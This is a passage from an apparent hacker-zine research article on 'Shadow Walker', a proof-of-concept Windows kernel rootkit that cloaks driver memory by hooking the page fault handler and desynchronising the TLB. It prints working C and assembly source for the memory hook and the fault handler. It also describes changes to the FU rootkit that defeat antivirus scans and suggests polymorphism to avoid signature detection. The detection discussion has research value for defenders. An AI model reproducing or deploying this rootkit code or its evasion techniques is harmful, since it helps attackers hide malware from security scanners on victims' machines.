     We don't want any other drivers or processes receiving the hidden
     mapping so we clear it).
  5. The driver lowers the IRQL to the previous level before it was raised.

The following additional restriction also applies:

   - No global data can be passed to kernel API functions. When calling an
     API, global data must be copied into local storage on the stack and
     passed into the API function (i.e. if the API accesses the cloaked
     variable it will receive fake data and perform incorrectly).

This protocol can be efficiently implemented in the hidden driver by having
the driver copy all global data over into local variables at the beginning
of the routine and then copy the data back after the function body has
completed executing. Because stack data is in a constant state of flux, it
is unlikely that a signature could be reliably obtained from global data on
the stack. In this way, there is no need to cause a page fault on every
global access. In general, only one page fault is required to copy over the
data at the beginning of the routine and one fault to copy the data back at
the end of the routine. Admittedly, this disregards more complex issues
involved with multithreaded access and synchronization. An alternative
approach to using a protocol between the driver and PF handler would be to
single step the instruction causing the memory access. This would be less
cumbersome for the driver and yet allow the PF handler to maintain control
of the DTLB (i.e. to flush it after the data access so that it remains
empty).

----[ 3.3 - Related Work

Ironically, the memory cloaking technology discussed in this article is
derived from an existing stack overflow protection scheme known as PaX. As
such, we demonstrate a potentially offensive application of an originally
defensive technology. Though very similar (i.e. taking advantage of the
Pentium split TLB architecture), there are subtle differences between PaX
and the rootkit application of the technology.
Whereas our memory cloaked rootkit enforces execute, diverted read / write
semantics, PaX enforces read / write, no execute semantics. This enables
PaX to provide software support for a non executable stack under the IA-32
architecture, thereby thwarting a large class of stack based buffer
overflow attacks. When a PaX protected system detects an attempted execute
in a read / write only range of memory, it terminates the offending
process. Hardware support for non executable memory has subsequently been
added to the page table entry format for some processors including IA-64
and Pentium 4. In contrast to PaX, our rootkit handler allows execution to
proceed normally while diverting read / write accesses to the hidden page
off to an innocent appearing shadow page. Finally, it should be noted that
PaX uses the PTE user / supervisor bit to generate the page faults required
to enforce its protection. This limits it to protecting user mode pages
only, which is an impractical limitation for a kernel mode rootkit. As
such, we use the PTE present / not present bit in our implementation.

----[ 3.4 - Proof Of Concept Implementation

Our current implementation uses a modified FU rootkit and a new page fault
handler called Shadow Walker. Since FU alters kernel data structures to
hide processes and does not utilize any code hooks, we only had to be
concerned with hiding the FU driver in memory. The kernel accounts for
every process running on the system by storing an object called an EPROCESS
block for each process in an internal linked list. FU disconnects the
process it wants to hide from this linked list.

------[ 3.4.a - Modified FU Rootkit

We modified the current version of the FU rootkit taken from rootkit.com.
In order to make it more stealthy, its dependence on a userland
initialization program was removed. Now, all setup information, in the form
of OS dependent offsets, is derived with a kernel level function.
By removing the userland portion, we eliminated the need to create a
symbolic link to the driver and the need to create a functional device,
both of which are easily detected. Once FU is installed, its image on the
file system can be deleted so all anti-virus scans on the file system will
fail to find it. You can also imagine that FU could be installed from a
kernel exploit and loaded into memory, thereby avoiding any image on disk
detection. Also, FU hides all processes whose names are prefixed with _fu_
regardless of the process ID (PID). We create a System thread that
continually scans the list of processes looking for this prefix. FU and the
memory hook, Shadow Walker, work in collusion; therefore, FU relies on
Shadow Walker to remove the driver from the linked list of drivers in
memory and from the Windows Object Manager's driver directory.

------[ 3.4.b - Shadow Walker Memory Hook Engine

Shadow Walker consists of a memory hook installation module and a new page
fault handler. The memory hook module takes the virtual address of the page
to be hidden as a parameter. It uses the information contained in the
address to perform a few sanity checks. Shadow Walker then installs the new
page fault handler by hooking Int 0E (if it has not been previously
installed) and inserts the information about the hidden page into a hash
table so that it can be looked up quickly on page faults. Lastly, the PTE
for the page is marked non present and the TLB entry for the hidden page is
flushed. This ensures that all subsequent accesses to the page are filtered
by the new page fault handler.

/*************************************************************************
 * HookMemoryPage - Hooks a memory page by marking it not present
 *                  and flushing any entries in the TLB. This ensures
 *                  that all subsequent memory accesses will generate
 *                  page faults and be filtered by the page fault handler.
 *
 * Parameters:
 * PVOID pExecutePage - pointer to the page that will be used on
 *                      execute access
 *
 * PVOID pReadWritePage - pointer to the page that will be used to load
 *                        the DTLB on data access
 *
 * PVOID pfnCallIntoHookedPage - A void function which will be called
 *                               from within the page fault handler
 *                               to load the ITLB on execute accesses
 *
 * PVOID pDriverStarts (optional) - Sets the start of the valid range
 *                                  for data accesses originating from
 *                                  within the hidden page.
 *
 * PVOID pDriverEnds (optional) - Sets the end of the valid range for
 *                                data accesses originating from within
 *                                the hidden page.
 * Return - None
 **************************************************************************/
void HookMemoryPage( PVOID pExecutePage, PVOID pReadWritePage,
                     PVOID pfnCallIntoHookedPage, PVOID pDriverStarts,
                     PVOID pDriverEnds )
{
    HOOKED_LIST_ENTRY HookedPage = {0};
    HookedPage.pExecuteView = pExecutePage;
    HookedPage.pReadWriteView = pReadWritePage;
    HookedPage.pfnCallIntoHookedPage = pfnCallIntoHookedPage;

    if( pDriverStarts != NULL)
        HookedPage.pDriverStarts = (ULONG)pDriverStarts;
    else
        HookedPage.pDriverStarts = (ULONG)pExecutePage;

    if( pDriverEnds != NULL)
        HookedPage.pDriverEnds = (ULONG)pDriverEnds;
    else
    {   //set by default if pDriverEnds is not specified
        if( IsInLargePage( pExecutePage ) )
            HookedPage.pDriverEnds =
                (ULONG)HookedPage.pDriverStarts + LARGE_PAGE_SIZE;
        else
            HookedPage.pDriverEnds =
                (ULONG)HookedPage.pDriverStarts + PAGE_SIZE;
    }//end if

    __asm cli //disable interrupts

    if( hooked == false )
    {
        HookInt( &g_OldInt0EHandler,
                 (unsigned long)NewInt0EHandler, 0x0E );
        hooked = true;
    }//end if

    HookedPage.pExecutePte = GetPteAddress( pExecutePage );
    HookedPage.pReadWritePte = GetPteAddress( pReadWritePage );

    //Insert the hooked page into the list
    PushPageIntoHookedList( HookedPage );

    //Enable the global page feature
    EnableGlobalPageFeature( HookedPage.pExecutePte );

    //Mark the page non present
    MarkPageNotPresent( HookedPage.pExecutePte );

    //Go ahead and flush the TLBs.
    //We want to guarantee that all subsequent accesses to this hooked
    //page are filtered through our new page fault handler.
    //invlpg takes a memory operand, so load the pointer's value first;
    //naming the variable directly would flush the entry for the stack
    //page that holds the pointer rather than the hooked page.
    __asm
    {
        mov eax, pExecutePage
        invlpg [eax]
    }

    __asm sti //reenable interrupts
}//end HookMemoryPage

The functionality of the page fault handler is relatively straightforward
despite the seeming complexity of the scheme. Its primary functions are to
determine if a given page fault is originating from a hooked page, resolve
the access type, and then load the appropriate TLB. As such, the page fault
handler has basically two execution paths. If the page is unhooked, the
fault is passed down to the operating system page fault handler. This is
determined as quickly and efficiently as possible. Faults originating from
user mode addresses or while the processor is running in user mode are
immediately passed down. The fate of kernel mode accesses is also quickly
decided via a hash table lookup. Alternatively, once the page has been
determined to be hooked, the access type is checked and directed to the
appropriate TLB loading code (execute accesses will cause an ITLB load
while read / write accesses cause a DTLB load). The procedure for TLB
loading is as follows:

  1. The appropriate physical frame mapping is loaded into the PTE for the
     faulting address.
  2. The page is temporarily marked present.
  3. For a DTLB load, a memory read on the hooked page is performed.
  4. For an ITLB load, a call into the hooked page is performed.
  5. The page is marked as non present again.
  6. The old physical frame mapping for the PTE is restored.

After TLB loading, control is directly returned to the faulting code.

/**************************************************************************
 * NewInt0EHandler - Page fault handler for the memory hook engine (aka.
 * the guts of this whole thing ;)
 *
 * Parameters - none
 *
 * Return - none
 *
 **************************************************************************/
void __declspec( naked ) NewInt0EHandler(void)
{
    __asm
    {
        pushad
        mov edx, dword ptr [esp+0x20] //PageFault.ErrorCode

        test edx, 0x04  //if the processor was in user mode, then
        jnz PassDown    //pass it down

        mov eax, cr2    //faulting virtual address
        cmp eax, HIGHEST_USER_ADDRESS
        jbe PassDown    //we don't hook user pages, pass it down

        ////////////////////////////////////////
        //Determine if it's a hooked page
        ////////////////////////////////////////
        push eax
        call FindPageInHookedList
        mov ebp, eax    //pointer to HOOKED_PAGE structure
        cmp ebp, ERROR_PAGE_NOT_IN_LIST
        jz PassDown     //it's not a hooked page

        ///////////////////////////////////////
        //NOTE: At this point we know it's a
        //hooked page. We also only hook
        //kernel mode pages which are either
        //non paged or locked down in memory
        //so we assume that all page tables
        //are resident to resolve the address
        //from here on out.
        ///////////////////////////////////////
        mov eax, cr2
        mov esi, PROCESS_PAGE_DIR_BASE
        mov ebx, eax
        shr ebx, 22
        lea ebx, [esi + ebx*4]      //ebx = pPTE for large page
        test dword ptr [ebx], 0x80  //check if it's a large page
        jnz IsLargePage

        mov esi, PROCESS_PAGE_TABLE_BASE
        mov ebx, eax
        shr ebx, 12
        lea ebx, [esi + ebx*4]      //ebx = pPTE

IsLargePage:

        cmp [esp+0x24], eax //Is it due to an attempted execute?
        jne LoadDTLB

        ////////////////////////////////
        // It's due to an execute. Load
        // up the ITLB.
        ////////////////////////////////
        cli
        or dword ptr [ebx], 0x01            //mark the page present
        call [ebp].pfnCallIntoHookedPage    //load the ITLB
        and dword ptr [ebx], 0xFFFFFFFE     //mark page not present
        sti
        jmp ReturnWithoutPassDown

        ////////////////////////////////
        // It's due to a read / write
        // Load up the DTLB
        ////////////////////////////////
        ////////////////////////////////
        // Check if the read / write
        // is originating from code
        // on the hidden page.
        ////////////////////////////////
LoadDTLB:
        mov edx, [esp+0x24]         //eip
        cmp edx, [ebp].pDriverStarts
        jb LoadFakeFrame
        cmp edx, [ebp].pDriverEnds
        ja LoadFakeFrame

        /////////////////////////////////
        // If the read / write is originating
        // from code on the hidden page, then
        // let it go through. The code on the
        // hidden page will follow protocol
        // to clear the TLB after the access.
        /////////////////////////////////
        cli
        or dword ptr [ebx], 0x01        //mark the page present
        mov eax, dword ptr [eax]        //load the DTLB
        and dword ptr [ebx], 0xFFFFFFFE //mark page not present
        sti
        jmp ReturnWithoutPassDown

        /////////////////////////////////
        // We want to fake out this read /
        // write. Our code is not generating
        // it.
        /////////////////////////////////
LoadFakeFrame:
        mov esi, [ebp].pReadWritePte
        mov ecx, dword ptr [esi]    //ecx = PTE of the
                                    //read / write page

        //replace the frame with the fake one
        mov edi, [ebx]
        and edi, 0x00000FFF //preserve the lower 12 bits of the
                            //faulting page's PTE
        and ecx, 0xFFFFF000 //isolate the physical address in
                            //the "fake" page's PTE
        or ecx, edi
        mov edx, [ebx]      //save the old PTE so we can replace it
        cli
        mov [ebx], ecx      //replace the faulting page's phys frame
                            //address w/ the fake one

        //load the DTLB
        or dword ptr [ebx], 0x01        //mark the page present
        mov eax, cr2                    //faulting virtual address
        mov eax, dword ptr [eax]        //do data access to load DTLB
        and dword ptr [ebx], 0xFFFFFFFE //re-mark page not present

        //Finally, restore the original PTE
        mov [ebx], edx
        sti

ReturnWithoutPassDown:
        popad
        add esp, 4      //discard the error code
        iretd

PassDown:
        popad
        jmp g_OldInt0EHandler

    }//end asm
}//end NewInt0E

--[ 4 - Known Limitations & Performance Impact

As our current rootkit is intended only as a proof of concept demonstration
rather than a fully engineered attack tool, it possesses a number of
implementation limitations. Most of the missing functionality could be
added, were one so inclined. First, there is no effort to support
hyperthreading or multiple processor systems.
Additionally, it does not support the Pentium PAE addressing mode which
extends the number of physically addressable bits from 32 to 36. Finally,
the design is limited to cloaking only 4K sized kernel mode pages (i.e. in
the upper 2 GB range of the memory address space). We mention the 4K page
limitation because there are currently some technical issues with regard to
hiding the 4MB page upon which ntoskrnl resides. Hiding the page containing
ntoskrnl would be a noteworthy extension. In terms of performance, we have
not completed rigorous testing, but subjectively speaking there is no
noticeable performance impact after the rootkit and memory hooking engine
are installed. For maximum performance, as mentioned previously, code and
data should remain on separate pages and the usage of global data should be
minimized to limit the impact on performance if one desires to enable both
data and executable page cloaking.

--[ 5 - Detection

There are at least a few obvious weaknesses that must be dealt with to
avoid detection. Our current proof of concept implementation does not
address them; however, we note them here for the sake of completeness.
Because we must be able to differentiate between normal page faults and
those faults related to the memory hook, we impose the requirement that
hooked pages must reside in non paged memory. Clearly, non present pages in
non paged memory present an abnormality. Whether or not this is a
sufficient heuristic to call a rootkit alarm is, however, debatable.
Locking down pageable memory using an API like MmProbeAndLockPages is
probably more stealthy. The next weakness lies in the need to disguise the
presence of the page fault handler. Because the page where the page fault
handler resides cannot be marked non present due to the obvious issues with
recursive reentry, it will be vulnerable to a simple signature scan and
must be obfuscated using more traditional methods.
Since this routine is small, written in ASM, and does not rely upon any
kernel APIs, polymorphism would be a reasonable solution. A related
weakness arises in the need to disguise the presence of the IDT hook. We
cannot use our memory hooking technique to disguise the modifications to
the interrupt descriptor table for similar reasons as the page fault
handler. While we could hook the page fault interrupt via an inline hook
rather than direct IDT modification, placing a memory hook on the page
containing the OS's INT 0E handler is problematic and inline hooks are
easily detected. Joanna Rutkowska proposed using the debug registers to
hide IDT hooks [5], but Edgar Barbosa demonstrated they are not a
completely effective solution [12]. This is due to the fact that debug
registers protect virtual as opposed to physical addresses. One may simply
remap the physical frame containing the IDT to a different virtual address
and read / write the IDT memory as one pleases. Shadow Walker falls prey to
this type of attack as well, based as it is upon the exploitation of
virtual rather than physical memory. Despite this acknowledged weakness,
most commercial security scanners still perform virtual rather than
physical memory scans and will be fooled by rootkits like Shadow Walker.
Finally, Shadow Walker is insidious. Even if a scanner detects Shadow
Walker, it will be virtually helpless to remove it on a running system.
Were it to successfully overwrite the hook with the original OS page fault
handler, for example, it would likely BSOD the system because there would
be some page faults occurring on the hidden pages which neither it nor the
OS would know how to handle.

--[ 6 - Conclusion

Shadow Walker is not a weaponized attack tool. Its functionality is limited
and it makes no effort to hide its hook on the IDT or its page fault
handler code. It provides only a practical proof of concept implementation
of virtual memory subversion.
By inverting the defensive software implementation of non executable
memory, we show that it is possible to subvert the view of virtual memory
relied upon by the operating system and almost all security scanner
applications. Due to its exploitation of the TLB architecture, Shadow
Walker is transparent and exhibits an extremely lightweight performance
hit. Such characteristics will no doubt make it an attractive solution for
viruses, worms, and spyware applications in addition to rootkits.

--[ 7 - References

 1. Tripwire, Inc. http://www.tripwire.com/
 2. Butler, James, VICE - Catch the hookers! Black Hat, Las Vegas, July,
    2004. www.blackhat.com/presentations/bh-usa-04/bh-us-04-butler/
    bh-us-04-butler.pdf
 3. Fuzen, FU Rootkit. http://www.rootkit.com/project.php?id=12
 4. Holy Father, Hacker Defender. http://hxdef.czweb.org/
 5. Rutkowska, Joanna, Detecting Windows Server Compromises with
    Patchfinder 2. January, 2004.
 6. Butler, James and Hoglund, Greg, Rootkits: Subverting the Windows
    Kernel. July, 2005.
 7. B. Cogswell and M. Russinovich, RootkitRevealer, available at:
    www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml
 8. F-Secure BlackLight (Helsinki, Finland: F-Secure Corporation, 2005):
    www.fsecure.com/blacklight/
 9. Jack, Barnaby. Remote Windows Exploitation: Step into the Ring 0
    http://www.eeye.com/~data/publish/whitepapers/research/
    OT20050205.FILE.pdf
10. Chong, S.K. Windows Local Kernel Exploitation.
    http://www.bellua.com/bcs2005/asia05.archive/
    BCSASIA2005-T04-SK-Windows_Local_Kernel_Exploitation.ppt
11. William A. Arbaugh, Timothy Fraser, Jesus Molina, and Nick L. Petroni:
    Copilot: A Coprocessor Based Runtime Integrity Monitor. Usenix Security
    Symposium 2004.
12. Barbosa, Edgar. Avoiding Windows Rootkit Detection
    http://packetstormsecurity.org/filedesc/bypassEPA.pdf
13. Rutkowska, Joanna. Concepts For The Stealth Windows Rootkit, Sept 2003
    http://www.invisiblethings.org/papers/chameleon_concepts.pdf
14. Russinovich, Mark and Solomon, David.
    Windows Internals, Fourth Edition.

--[ 8 - Acknowledgements

Thanks and acknowledgements go to Joanna Rutkowska for her Chameleon
Project paper as it was one of the inspirations for this project, to the
PaX team for showing how to desynchronize the TLB in their software
implementation of non executable memory, to Halvar Flake for our initial
discussions of the Shadow Walker idea, and to Kayaker for helping beta test
and debug some of the code. We would finally like to extend our greetings
to all of the contributors on rootkit.com :)

|=[ EOF ]=---------------------------------------------------------------=|